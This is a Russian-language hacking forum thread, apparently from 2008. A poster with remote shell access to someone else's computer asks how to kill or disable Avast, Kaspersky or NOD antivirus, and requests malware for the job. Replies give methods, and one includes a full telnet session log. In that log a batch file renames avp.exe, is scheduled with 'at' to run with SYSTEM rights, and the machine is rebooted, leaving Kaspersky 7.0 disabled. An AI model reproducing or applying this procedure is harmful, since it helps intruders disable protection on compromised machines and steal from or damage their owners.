![]() |
Убить антивир
В общем вопрос такой:
Как можно убить или временно обезвредить антивир имея полный доступ к удаленной машине, ко всем папкам, процессам, шеллу и т.д?? (интересует Аваст. Касперыч, Нод).. Ну или посоветуйте какуюнибудь малварину для подобных целей.. За ранее благодарен. |
полный доступ к удаленной машине c правами администратора?
|
Цитата:
|
Для Каспера есть специальная утилита- KAV/KIS Remover. Найти ее можно на сайте касперского.
|
Практически универсальный способ - переименовать исполняемый файл и перезагрузиться.
|
не получится переименовать, т.к. защищен
|
у обычных антивирусов можно просто грохнуть процесс/сервис и потом отрубить автозагрузку.
с каспером сложнее ) |
Цитата:
Цитата:
Цитата:
-- Не.. Защищен, не хочет. |
По прежнему ищу выход)
|
Цитата:
Демонстрирую небольшой лог моей telnet-сессии, как оное должно быть (с мини-комментариями, выделены зелёным, если надо полнее - отпишусь). Система - Windows XP Pro Sp2, KAV 7.0, потенциально будет работать и на других антивирусах. C:\>tasklist Код:
Имя образа PID Имя сессии № сеанса ПамятьC:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>move avp.exe avp.ex_ Отказано в доступе. Ожидаемый и печальный эффект, поднимаем права до Local System. C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>cd \ C:\>copy con kill_avp.bat @echo off cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" move avp.exe avp.ex_ ^Z Скопировано файлов: 1. C:\>type kill_avp.bat @echo off cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" move avp.exe avp.ex_ C:\>time Текущее время: 18:19:05,92 Введите новое время: C:\>at 18:20 c:\kill_avp.bat Добавлена новая задача с кодом 1 C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0" C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.exe Том в устройстве C не имеет метки. Серийный номер тома: D007-EFC9 Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0 28.06.2007 12:58 10 560 rescue32.exe 1 файлов 10 560 байт 0 папок 1 244 950 528 байт свободно C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.ex_ Том в устройстве C не имеет метки. Серийный номер тома: D007-EFC9 Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0 28.06.2007 12:51 218 376 avp.ex_ 1 файлов 218 376 байт 0 папок 1 244 950 528 байт свободно C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0> Ну вот, собственно говоря, и всё. C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>shutdown -r -t 0 сообщение от администратора в PAUL, 24.09.2008 18:25:55 The computer is shutting down...... Подключение к узлу утеряно. Вторая сессия: C:\Documents and Settings\admin>tasklist Код:
Имя образа PID Имя сессии № сеанса Память |
| Время: 19:47 |